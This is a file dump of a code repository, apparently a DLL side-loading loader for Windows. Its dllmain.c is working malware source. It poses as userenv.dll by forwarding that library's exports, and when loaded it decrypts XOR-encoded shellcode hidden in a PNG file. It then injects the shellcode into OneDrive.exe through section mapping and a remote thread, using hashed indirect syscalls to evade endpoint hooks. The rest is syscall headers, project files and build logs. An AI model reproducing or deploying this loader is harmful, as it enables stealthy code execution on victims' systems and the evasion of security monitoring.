272 | SystemWow64SharedInformationObsolete = 0x4a,
273 | SystemRegisterFirmwareTableInformationHandler = 0x4b,
274 | SystemFirmwareTableInformation = 0x4c,
275 | SystemModuleInformationEx = 0x4d,
276 | SystemVerifierTriageInformation = 0x4e,
277 | SystemSuperfetchInformation = 0x4f,
278 | SystemMemoryListInformation = 0x50,
279 | SystemFileCacheInformationEx = 0x51,
280 | SystemThreadPriorityClientIdInformation = 0x52,
281 | SystemProcessorIdleCycleTimeInformation = 0x53,
282 | SystemVerifierCancellationInformation = 0x54,
283 | SystemProcessorPowerInformationEx = 0x55,
284 | SystemRefTraceInformation = 0x56,
285 | SystemSpecialPoolInformation = 0x57,
286 | SystemProcessIdInformation = 0x58,
287 | SystemErrorPortInformation = 0x59,
288 | SystemBootEnvironmentInformation = 0x5a,
289 | SystemHypervisorInformation = 0x5b,
290 | SystemVerifierInformationEx = 0x5c,
291 | SystemTimeZoneInformation = 0x5d,
292 | SystemImageFileExecutionOptionsInformation = 0x5e,
293 | SystemCoverageInformation = 0x5f,
294 | SystemPrefetchPatchInformation = 0x60,
295 | SystemVerifierFaultsInformation = 0x61,
296 | SystemSystemPartitionInformation = 0x62,
297 | SystemSystemDiskInformation = 0x63,
298 | SystemProcessorPerformanceDistribution = 0x64,
299 | SystemNumaProximityNodeInformation = 0x65,
300 | SystemDynamicTimeZoneInformation = 0x66,
301 | SystemCodeIntegrityInformation = 0x67,
302 | SystemProcessorMicrocodeUpdateInformation = 0x68,
303 | SystemProcessorBrandString = 0x69,
304 | SystemVirtualAddressInformation = 0x6a,
305 | SystemLogicalProcessorAndGroupInformation = 0x6b,
306 | SystemProcessorCycleTimeInformation = 0x6c,
307 | SystemStoreInformation = 0x6d,
308 | SystemRegistryAppendString = 0x6e,
309 | SystemAitSamplingValue = 0x6f,
310 | SystemVhdBootInformation = 0x70,
311 | SystemCpuQuotaInformation = 0x71,
312 | SystemNativeBasicInformation = 0x72,
313 | SystemErrorPortTimeouts = 0x73,
314 | SystemLowPriorityIoInformation = 0x74,
315 | SystemBootEntropyInformation = 0x75,
316 | SystemVerifierCountersInformation = 0x76,
317 | SystemPagedPoolInformationEx = 0x77,
318 | SystemSystemPtesInformationEx = 0x78,
319 | SystemNodeDistanceInformation = 0x79,
320 | SystemAcpiAuditInformation = 0x7a,
321 | SystemBasicPerformanceInformation = 0x7b,
322 | SystemQueryPerformanceCounterInformation = 0x7c,
323 | SystemSessionBigPoolInformation = 0x7d,
324 | SystemBootGraphicsInformation = 0x7e,
325 | SystemScrubPhysicalMemoryInformation = 0x7f,
326 | SystemBadPageInformation = 0x80,
327 | SystemProcessorProfileControlArea = 0x81,
328 | SystemCombinePhysicalMemoryInformation = 0x82,
329 | SystemEntropyInterruptTimingInformation = 0x83,
330 | SystemConsoleInformation = 0x84,
331 | SystemPlatformBinaryInformation = 0x85,
332 | SystemThrottleNotificationInformation = 0x86,
333 | SystemHypervisorProcessorCountInformation = 0x87,
334 | SystemDeviceDataInformation = 0x88,
335 | SystemDeviceDataEnumerationInformation = 0x89,
336 | SystemMemoryTopologyInformation = 0x8a,
337 | SystemMemoryChannelInformation = 0x8b,
338 | SystemBootLogoInformation = 0x8c,
339 | SystemProcessorPerformanceInformationEx = 0x8d,
340 | SystemSpare0 = 0x8e,
341 | SystemSecureBootPolicyInformation = 0x8f,
342 | SystemPageFileInformationEx = 0x90,
343 | SystemSecureBootInformation = 0x91,
344 | SystemEntropyInterruptTimingRawInformation = 0x92,
345 | SystemPortableWorkspaceEfiLauncherInformation = 0x93,
346 | SystemFullProcessInformation = 0x94,
347 | SystemKernelDebuggerInformationEx = 0x95,
348 | SystemBootMetadataInformation = 0x96,
349 | SystemSoftRebootInformation = 0x97,
350 | SystemElamCertificateInformation = 0x98,
351 | SystemOfflineDumpConfigInformation = 0x99,
352 | SystemProcessorFeaturesInformation = 0x9a,
353 | SystemRegistryReconciliationInformation = 0x9b,
354 | MaxSystemInfoClass = 0x9c,
355 | } SYSTEM_INFORMATION_CLASS;
356 |
357 | typedef struct _CLIENT_ID {
358 | HANDLE UniqueProcess;
359 | HANDLE UniqueThread;
360 | } CLIENT_ID, * PCLIENT_ID;
361 |
362 | PVOID findNtDll(void);
363 | WCHAR* toLower(WCHAR* str);
364 |
365 | extern void PrepareSyscall(DWORD dwSycallNr, PVOID dw64Gate);
366 | extern DoSyscall();
367 |
368 | PVOID findNtDll(void);
369 | DWORD getSyscall(DWORD crypted_hash, Syscall* pSyscall);
370 |
371 | unsigned long djb2_unicode(const wchar_t* str);
372 | unsigned long djb2(unsigned char* str);
373 | unsigned long xor_hash(unsigned long hash);
374 | int my_strcmp(const char* p1, const char* p2);
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/SideLoadingDLL.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {68e703a8-afb7-4e92-9841-c085c923af06}
25 | userenvsyscalls
26 | 10.0
27 |
28 |
29 |
30 | DynamicLibrary
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | DynamicLibrary
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | DynamicLibrary
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | DynamicLibrary
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | true
76 |
77 |
78 | false
79 |
80 |
81 | true
82 |
83 |
84 | false
85 |
86 |
87 |
88 | Level3
89 | true
90 | WIN32;_DEBUG;USERENVSYSCALLS_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
91 | true
92 | Use
93 | pch.h
94 |
95 |
96 | Windows
97 | true
98 | false
99 |
100 |
101 |
102 |
103 | Level3
104 | true
105 | true
106 | true
107 | WIN32;NDEBUG;USERENVSYSCALLS_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
108 | true
109 | Use
110 | pch.h
111 |
112 |
113 | Windows
114 | true
115 | true
116 | true
117 | false
118 |
119 |
120 |
121 |
122 | Level3
123 | true
124 | _DEBUG;USERENVSYSCALLS_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
125 | true
126 | NotUsing
127 | pch.h
128 |
129 |
130 | Windows
131 | true
132 | false
133 |
134 |
135 |
136 |
137 | Level3
138 | true
139 | true
140 | true
141 | NDEBUG;USERENVSYSCALLS_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
142 | true
143 | NotUsing
144 | pch.h
145 |
146 |
147 | Windows
148 | true
149 | true
150 | true
151 | false
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 | Document
166 |
167 |
168 |
169 |
170 |
171 |
172 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/SideLoadingDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
37 |
38 | Source Files
39 |
40 |
41 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/SideLoadingDLL.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/dllmain.c:
--------------------------------------------------------------------------------
1 | // dllmain.c : Defines the entry point for the DLL application.
2 | #include "windows.h"
3 | #include "Defines.h"
4 | #include "RecycleGate.h"
5 | #include "stdio.h"
6 |
7 | #define STATUS_SUCCESS 0
8 |
9 | extern void PrepareSyscall(DWORD dwSycallNr, PVOID dw64Gate);
10 | extern DoSyscall();
11 |
12 | #pragma comment(linker,"/export:AreThereVisibleLogoffScripts=C:\\windows\\system32\\userenv.AreThereVisibleLogoffScripts,@106")
13 | #pragma comment(linker,"/export:AreThereVisibleShutdownScripts=C:\\windows\\system32\\userenv.AreThereVisibleShutdownScripts,@107")
14 | #pragma comment(linker,"/export:CreateAppContainerProfile=C:\\windows\\system32\\userenv.CreateAppContainerProfile,@108")
15 | #pragma comment(linker,"/export:CreateEnvironmentBlock=C:\\windows\\system32\\userenv.CreateEnvironmentBlock,@109")
16 | #pragma comment(linker,"/export:CreateProfile=C:\\windows\\system32\\userenv.CreateProfile,@110")
17 | #pragma comment(linker,"/export:DeleteAppContainerProfile=C:\\windows\\system32\\userenv.DeleteAppContainerProfile,@111")
18 | #pragma comment(linker,"/export:DeleteProfileA=C:\\windows\\system32\\userenv.DeleteProfileA,@112")
19 | #pragma comment(linker,"/export:DeleteProfileW=C:\\windows\\system32\\userenv.DeleteProfileW,@113")
20 | #pragma comment(linker,"/export:DeriveAppContainerSidFromAppContainerName=C:\\windows\\system32\\userenv.DeriveAppContainerSidFromAppContainerName,@114")
21 | #pragma comment(linker,"/export:DeriveRestrictedAppContainerSidFromAppContainerSidAndRestrictedName=C:\\windows\\system32\\userenv.DeriveRestrictedAppContainerSidFromAppContainerSidAndRestrictedName,@115")
22 | #pragma comment(linker,"/export:DestroyEnvironmentBlock=C:\\windows\\system32\\userenv.DestroyEnvironmentBlock,@116")
23 | #pragma comment(linker,"/export:DllCanUnloadNow=C:\\windows\\system32\\userenv.DllCanUnloadNow,@117")
24 | #pragma comment(linker,"/export:DllGetClassObject=C:\\windows\\system32\\userenv.DllGetClassObject,@118")
25 | #pragma comment(linker,"/export:DllRegisterServer=C:\\windows\\system32\\userenv.DllRegisterServer,@119")
26 | #pragma comment(linker,"/export:DllUnregisterServer=C:\\windows\\system32\\userenv.DllUnregisterServer,@120")
27 | #pragma comment(linker,"/export:EnterCriticalPolicySection=C:\\windows\\system32\\userenv.EnterCriticalPolicySection,@121")
28 | #pragma comment(linker,"/export:ExpandEnvironmentStringsForUserA=C:\\windows\\system32\\userenv.ExpandEnvironmentStringsForUserA,@123")
29 | #pragma comment(linker,"/export:ExpandEnvironmentStringsForUserW=C:\\windows\\system32\\userenv.ExpandEnvironmentStringsForUserW,@124")
30 | #pragma comment(linker,"/export:ForceSyncFgPolicy=C:\\windows\\system32\\userenv.ForceSyncFgPolicy,@125")
31 | #pragma comment(linker,"/export:FreeGPOListA=C:\\windows\\system32\\userenv.FreeGPOListA,@126")
32 | #pragma comment(linker,"/export:FreeGPOListW=C:\\windows\\system32\\userenv.FreeGPOListW,@127")
33 | #pragma comment(linker,"/export:GenerateGPNotification=C:\\windows\\system32\\userenv.GenerateGPNotification,@128")
34 | #pragma comment(linker,"/export:GetAllUsersProfileDirectoryA=C:\\windows\\system32\\userenv.GetAllUsersProfileDirectoryA,@129")
35 | #pragma comment(linker,"/export:GetAllUsersProfileDirectoryW=C:\\windows\\system32\\userenv.GetAllUsersProfileDirectoryW,@130")
36 | #pragma comment(linker,"/export:GetAppContainerFolderPath=C:\\windows\\system32\\userenv.GetAppContainerFolderPath,@131")
37 | #pragma comment(linker,"/export:GetAppContainerRegistryLocation=C:\\windows\\system32\\userenv.GetAppContainerRegistryLocation,@132")
38 | #pragma comment(linker,"/export:GetAppliedGPOListA=C:\\windows\\system32\\userenv.GetAppliedGPOListA,@133")
39 | #pragma comment(linker,"/export:GetAppliedGPOListW=C:\\windows\\system32\\userenv.GetAppliedGPOListW,@134")
40 | #pragma comment(linker,"/export:GetDefaultUserProfileDirectoryA=C:\\windows\\system32\\userenv.GetDefaultUserProfileDirectoryA,@136")
41 | #pragma comment(linker,"/export:GetDefaultUserProfileDirectoryW=C:\\windows\\system32\\userenv.GetDefaultUserProfileDirectoryW,@138")
42 | #pragma comment(linker,"/export:GetGPOListA=C:\\windows\\system32\\userenv.GetGPOListA,@140")
43 | #pragma comment(linker,"/export:GetGPOListW=C:\\windows\\system32\\userenv.GetGPOListW,@141")
44 | #pragma comment(linker,"/export:GetNextFgPolicyRefreshInfo=C:\\windows\\system32\\userenv.GetNextFgPolicyRefreshInfo,@142")
45 | #pragma comment(linker,"/export:GetPreviousFgPolicyRefreshInfo=C:\\windows\\system32\\userenv.GetPreviousFgPolicyRefreshInfo,@143")
46 | #pragma comment(linker,"/export:GetProfileType=C:\\windows\\system32\\userenv.GetProfileType,@144")
47 | #pragma comment(linker,"/export:GetProfilesDirectoryA=C:\\windows\\system32\\userenv.GetProfilesDirectoryA,@145")
48 | #pragma comment(linker,"/export:GetProfilesDirectoryW=C:\\windows\\system32\\userenv.GetProfilesDirectoryW,@146")
49 | #pragma comment(linker,"/export:GetUserProfileDirectoryA=C:\\windows\\system32\\userenv.GetUserProfileDirectoryA,@147")
50 | #pragma comment(linker,"/export:GetUserProfileDirectoryW=C:\\windows\\system32\\userenv.GetUserProfileDirectoryW,@148")
51 | #pragma comment(linker,"/export:HasPolicyForegroundProcessingCompleted=C:\\windows\\system32\\userenv.HasPolicyForegroundProcessingCompleted,@149")
52 | #pragma comment(linker,"/export:LeaveCriticalPolicySection=C:\\windows\\system32\\userenv.LeaveCriticalPolicySection,@150")
53 | #pragma comment(linker,"/export:LoadProfileExtender=C:\\windows\\system32\\userenv.LoadProfileExtender,@151")
54 | #pragma comment(linker,"/export:LoadUserProfileA=C:\\windows\\system32\\userenv.LoadUserProfileA,@152")
55 | #pragma comment(linker,"/export:LoadUserProfileW=C:\\windows\\system32\\userenv.LoadUserProfileW,@153")
56 | #pragma comment(linker,"/export:ProcessGroupPolicyCompleted=C:\\windows\\system32\\userenv.ProcessGroupPolicyCompleted,@154")
57 | #pragma comment(linker,"/export:ProcessGroupPolicyCompletedEx=C:\\windows\\system32\\userenv.ProcessGroupPolicyCompletedEx,@155")
58 | #pragma comment(linker,"/export:RefreshPolicy=C:\\windows\\system32\\userenv.RefreshPolicy,@156")
59 | #pragma comment(linker,"/export:RefreshPolicyEx=C:\\windows\\system32\\userenv.RefreshPolicyEx,@157")
60 | #pragma comment(linker,"/export:RegisterGPNotification=C:\\windows\\system32\\userenv.RegisterGPNotification,@158")
61 | #pragma comment(linker,"/export:RsopAccessCheckByType=C:\\windows\\system32\\userenv.RsopAccessCheckByType,@159")
62 | #pragma comment(linker,"/export:RsopFileAccessCheck=C:\\windows\\system32\\userenv.RsopFileAccessCheck,@160")
63 | #pragma comment(linker,"/export:RsopLoggingEnabled=C:\\windows\\system32\\userenv.RsopLoggingEnabled,@105")
64 | #pragma comment(linker,"/export:RsopResetPolicySettingStatus=C:\\windows\\system32\\userenv.RsopResetPolicySettingStatus,@161")
65 | #pragma comment(linker,"/export:RsopSetPolicySettingStatus=C:\\windows\\system32\\userenv.RsopSetPolicySettingStatus,@162")
66 | #pragma comment(linker,"/export:UnloadProfileExtender=C:\\windows\\system32\\userenv.UnloadProfileExtender,@163")
67 | #pragma comment(linker,"/export:UnloadUserProfile=C:\\windows\\system32\\userenv.UnloadUserProfile,@164")
68 | #pragma comment(linker,"/export:UnregisterGPNotification=C:\\windows\\system32\\userenv.UnregisterGPNotification,@165")
69 | #pragma comment(linker,"/export:WaitForMachinePolicyForegroundProcessing=C:\\windows\\system32\\userenv.WaitForMachinePolicyForegroundProcessing,@166")
70 | #pragma comment(linker,"/export:WaitForUserPolicyForegroundProcessing=C:\\windows\\system32\\userenv.WaitForUserPolicyForegroundProcessing,@167")
71 |
72 | char key[] = "muisdfh78934hfn438sdnfjkv";
73 |
74 |
75 | void XOR(char* data, size_t data_len, char* key, size_t key_len) {
76 | int j;
77 |
78 | j = 0;
79 | for (int i = 0; i < data_len; i++) {
80 | if (j == key_len - 1) j = 0;
81 |
82 | data[i] = data[i] ^ key[j];
83 | j++;
84 | }
85 | }
86 |
87 | void sleep()
88 | {
89 | for (int i = 0; i <= 500000; i++)
90 | {
91 | for (int j = 2; j <= i / 2; j++)
92 | {
93 | if (i % j == 0)
94 | {
95 | break;
96 | }
97 | }
98 | }
99 | }
100 |
101 | HANDLE findTarget(char* target)
102 | {
103 | NTSTATUS status;
104 | PVOID buffer;
105 | PSYSTEM_PROCESS_INFO spi;
106 |
107 | buffer = VirtualAlloc(NULL, 1024 * 1024, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // We need to allocate a large buffer because the process list can be large.
108 |
109 | if (!buffer)
110 | {
111 | return -1;
112 | }
113 |
114 | spi = (PSYSTEM_PROCESS_INFO)buffer;
115 |
116 | Syscall sysNtQuerySystemInformation = { 0x00 };
117 | DWORD dwSuccess = FAIL;
118 |
119 | dwSuccess = getSyscall(0xaf0d30ec, &sysNtQuerySystemInformation);
120 | if (dwSuccess == FAIL)
121 | return 0x01;
122 |
123 | PrepareSyscall(sysNtQuerySystemInformation.dwSyscallNr, sysNtQuerySystemInformation.pRecycledGate);
124 | if (!NT_SUCCESS(status = DoSyscall(SystemProcessInformation, spi, 1024 * 1024, NULL)))
125 | {
126 | VirtualFree(buffer, 0, MEM_RELEASE);
127 | return -1;
128 | }
129 |
130 | while (spi->NextEntryOffset) // Loop over the list until we reach the last entry.
131 | {
132 | wchar_t pName[256];
133 | memset(pName, 0, sizeof(pName));
134 | WideCharToMultiByte(CP_ACP, 0, spi->ImageName.Buffer, spi->ImageName.Length, (LPSTR)pName, sizeof(pName), NULL, NULL);
135 |
136 | int result = my_strcmp(target, (char*)pName);
137 | if (!result) {
138 | HANDLE pid = (HANDLE)spi->ProcessId;
139 | VirtualFree(buffer, 0, MEM_RELEASE); // Free the allocated buffer.
140 | return pid;
141 | }
142 |
143 | spi = (PSYSTEM_PROCESS_INFO)((LPBYTE)spi + spi->NextEntryOffset); // Calculate the address of the next entry.
144 |
145 | }
146 | VirtualFree(buffer, 0, MEM_RELEASE); // Free the allocated buffer.
147 | return 0;
148 | }
149 |
150 |
151 | PVOID VxMoveMemory(PVOID dest, const PVOID src, SIZE_T len) {
152 | char* d = (char*)dest;
153 | char* s = (char*)src;
154 | if (d < s)
155 | while (len--)
156 | *d++ = *s++;
157 | else {
158 | char* lasts = s + (len - 1);
159 | char* lastd = d + (len - 1);
160 | while (len--)
161 | *lastd-- = *lasts--;
162 | }
163 | return dest;
164 | }
165 |
166 |
167 | int ProxyFunction()
168 | {
169 | HANDLE file = NULL;
170 | DWORD fileSize = NULL;
171 | DWORD bytesRead = NULL;
172 | LPVOID fileData = NULL;
173 |
174 | // Reading our encrypted shellcode
175 | file = CreateFileA("maor.png", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
176 | if (file == INVALID_HANDLE_VALUE) {
177 | return 1;
178 | }
179 | fileSize = GetFileSize(file, NULL);
180 | fileData = HeapAlloc(GetProcessHeap(), 0, fileSize);
181 | ReadFile(file, fileData, fileSize, &bytesRead, NULL);
182 | unsigned char* shellcode = (unsigned char*)fileData;
183 |
184 | HANDLE Entry = findTarget("OneDrive.exe"); // Targeting the OneDrive.exe process
185 | Syscall sysZwOpenProcess = { 0x0 };
186 | NTSTATUS dwSuccess = FAIL;
187 | HANDLE hProc = 0;
188 |
189 | dwSuccess = getSyscall(0xda1009c3, &sysZwOpenProcess);
190 | if (dwSuccess == FAIL)
191 | return 0x01;
192 |
193 | OBJECT_ATTRIBUTES oa;
194 | CLIENT_ID cid = { (HANDLE)Entry, NULL };
195 | InitializeObjectAttributes(&oa, NULL, 0, NULL, NULL);
196 | PrepareSyscall(sysZwOpenProcess.dwSyscallNr, sysZwOpenProcess.pRecycledGate);
197 | DoSyscall(&hProc, PROCESS_ALL_ACCESS, &oa, &cid);
198 |
199 | if (hProc != NULL)
200 | {
201 | Syscall sysZwCreateSection = { 0x0 };
202 | Syscall sysNtMapViewOfSection = { 0x0 };
203 | Syscall sysNtCreateThreadEx = { 0x0 };
204 | Syscall sysNtResumeThread = { 0x0 };
205 | Syscall sysNtDelayExeuction = { 0x0 };
206 |
207 | DWORD dwSuccess = FAIL;
208 | // Prepare the syscalls
209 | dwSuccess = getSyscall(0x6805b1fb, &sysZwCreateSection);
210 | if (dwSuccess == FAIL)
211 | return 0x01;
212 |
213 | dwSuccess = getSyscall(0x625d5a2e, &sysNtMapViewOfSection);
214 | if (dwSuccess == FAIL)
215 | return 0x01;
216 |
217 | dwSuccess = getSyscall(0x8a4e6274, &sysNtCreateThreadEx);
218 | if (dwSuccess == FAIL)
219 | return 0x01;
220 |
221 | dwSuccess = getSyscall(0x6d397e74, &sysNtResumeThread);
222 | if (dwSuccess == FAIL)
223 | return 0x01;
224 |
225 | SIZE_T shellcodeSize = fileSize;
226 | HANDLE hSection = NULL;
227 | NTSTATUS status = NULL;
228 | SIZE_T size = fileSize;
229 | LARGE_INTEGER sectionSize = { size };
230 | PVOID pLocalView = NULL, pRemoteView = NULL;
231 | int viewUnMap = 2;
232 |
233 | XOR((char*)shellcode, shellcodeSize, key, sizeof(key));
234 |
235 | PrepareSyscall(sysZwCreateSection.dwSyscallNr, sysZwCreateSection.pRecycledGate);
236 | if ((status = DoSyscall(&hSection, SECTION_ALL_ACCESS, NULL, (PLARGE_INTEGER)§ionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS) {
237 | return -1;
238 | }
239 |
240 |
241 | PrepareSyscall(sysNtMapViewOfSection.dwSyscallNr, sysNtMapViewOfSection.pRecycledGate);
242 | if ((status = DoSyscall(hSection, GetCurrentProcess(),
243 | &pLocalView, NULL, NULL, NULL,
244 | (PULONG)&size, (SECTION_INHERIT)viewUnMap, NULL, PAGE_READWRITE)) != STATUS_SUCCESS) {
245 | return -1;
246 | }
247 |
248 |
249 | VxMoveMemory(pLocalView, shellcode, shellcodeSize);
250 |
251 | PrepareSyscall(sysNtMapViewOfSection.dwSyscallNr, sysNtMapViewOfSection.pRecycledGate);
252 | if ((status = DoSyscall(hSection, hProc, &pRemoteView, NULL, NULL, NULL,
253 | (PULONG)&size, (SECTION_INHERIT)viewUnMap, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) {
254 | return -1;
255 | }
256 |
257 |
258 | HANDLE hHostThread = INVALID_HANDLE_VALUE;
259 | PrepareSyscall(sysNtCreateThreadEx.dwSyscallNr, sysNtCreateThreadEx.pRecycledGate);
260 | if (( status = DoSyscall(&hHostThread, THREAD_ALL_ACCESS, &oa, hProc, (LPTHREAD_START_ROUTINE)pRemoteView, pRemoteView, FALSE, 0, 0, 0, NULL)) != STATUS_SUCCESS)
261 | {
262 | return -1;
263 | }
264 |
265 | PrepareSyscall(sysNtResumeThread.dwSyscallNr, sysNtResumeThread.pRecycledGate);
266 | DoSyscall(hHostThread);
267 | }
268 | return 0;
269 | }
270 |
271 |
272 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
273 | {
274 | switch (ul_reason_for_call)
275 | {
276 | case DLL_PROCESS_ATTACH:
277 | ProxyFunction();
278 | break;
279 | case DLL_THREAD_ATTACH:
280 | case DLL_THREAD_DETACH:
281 | case DLL_PROCESS_DETACH:
282 | break;
283 | }
284 | return TRUE;
285 | }
286 |
287 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/framework.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
4 | // Windows Header Files
5 | #include
6 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/GateTrampolin.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/GateTrampolin.obj
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/RecycleGate.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/RecycleGate.obj
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | c:\users\maorpt\desktop\github\sideloadingdll\sideloadingdll\sideloadingdll\x64\release\vc143.pdb
2 | c:\users\maorpt\desktop\github\sideloadingdll\sideloadingdll\sideloadingdll\x64\release\recyclegate.obj
3 | c:\users\maorpt\desktop\github\sideloadingdll\sideloadingdll\sideloadingdll\x64\release\dllmain.obj
4 | c:\users\maorpt\desktop\github\sideloadingdll\sideloadingdll\x64\release\sideloadingdll.dll
5 | c:\users\maorpt\desktop\github\sideloadingdll\sideloadingdll\sideloadingdll\x64\release\sideloadingdll.ipdb
6 | c:\users\maorpt\desktop\github\sideloadingdll\sideloadingdll\x64\release\sideloadingdll.pdb
7 | c:\users\maorpt\desktop\github\sideloadingdll\sideloadingdll\sideloadingdll\x64\release\sideloadingdll.iobj
8 | c:\users\maorpt\desktop\github\sideloadingdll\sideloadingdll\x64\release\sideloadingdll.lib
9 | c:\users\maorpt\desktop\github\sideloadingdll\sideloadingdll\x64\release\sideloadingdll.exp
10 | c:\users\maorpt\desktop\github\sideloadingdll\sideloadingdll\sideloadingdll\x64\release\gatetrampolin.obj
11 | c:\users\maorpt\desktop\github\sideloadingdll\sideloadingdll\sideloadingdll\x64\release\sideloadingdll.tlog\cl.command.1.tlog
12 | c:\users\maorpt\desktop\github\sideloadingdll\sideloadingdll\sideloadingdll\x64\release\sideloadingdll.tlog\cl.read.1.tlog
13 | c:\users\maorpt\desktop\github\sideloadingdll\sideloadingdll\sideloadingdll\x64\release\sideloadingdll.tlog\cl.write.1.tlog
14 | c:\users\maorpt\desktop\github\sideloadingdll\sideloadingdll\sideloadingdll\x64\release\sideloadingdll.tlog\link.command.1.tlog
15 | c:\users\maorpt\desktop\github\sideloadingdll\sideloadingdll\sideloadingdll\x64\release\sideloadingdll.tlog\link.read.1.tlog
16 | c:\users\maorpt\desktop\github\sideloadingdll\sideloadingdll\sideloadingdll\x64\release\sideloadingdll.tlog\link.write.1.tlog
17 | c:\users\maorpt\desktop\github\sideloadingdll\sideloadingdll\sideloadingdll\x64\release\sideloadingdll.tlog\link.write.2u.tlog
18 | c:\users\maorpt\desktop\github\sideloadingdll\sideloadingdll\sideloadingdll\x64\release\sideloadingdll.tlog\masm.read.1u.tlog
19 | c:\users\maorpt\desktop\github\sideloadingdll\sideloadingdll\sideloadingdll\x64\release\sideloadingdll.tlog\masm.write.1u.tlog
20 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.dll.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | C:\Users\MaorPT\Desktop\Github\SideLoadingDLL\SideLoadingDLL\x64\Release\SideLoadingDLL.dll
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.iobj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.iobj
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.ipdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MaorSabag/SideLoadingDLL/3fc4067bac82d19f269fa55ec247c8a1266b589a/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.ipdb
--------------------------------------------------------------------------------
/SideLoadingDLL/SideLoadingDLL/x64/Release/SideLoadingDLL.log:
--------------------------------------------------------------------------------
1 | C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v170\Microsoft.CppBuild.targets(510,5): warning MSB8028: The intermediate directory (x64\Release\) contains files shared from another project (userenv-syscalls.vcxproj). This can lead to incorrect clean and rebuild behavior.
2 | Assembling GateTrampolin.asm...
3 | dllmain.c
4 | C:\Users\Maor-PT\Desktop\Programs\SideLoadingDLL\SideLoadingDLL\SideLoadingDLL\dllmain.c(135,42): warning C4311: 'type cast': pointer truncation from 'HANDLE' to 'int'
5 | C:\Users\Maor-PT\Desktop\Programs\SideLoadingDLL\SideLoadingDLL\SideLoadingDLL\dllmain.c(189,35): warning C4312: 'type cast': conversion from 'int' to 'PVOID' of greater size
6 | C:\Users\Maor-PT\Desktop\Programs\SideLoadingDLL\SideLoadingDLL\SideLoadingDLL\dllmain.c(185,35): warning C4244: 'initializing': conversion from 'SIZE_T' to 'DWORD', possible loss of data
7 | C:\Users\Maor-PT\Desktop\Programs\SideLoadingDLL\SideLoadingDLL\SideLoadingDLL\dllmain.c(213,1): warning C4047: 'initializing': 'DWORD' differs in levels of indirection from 'void *'
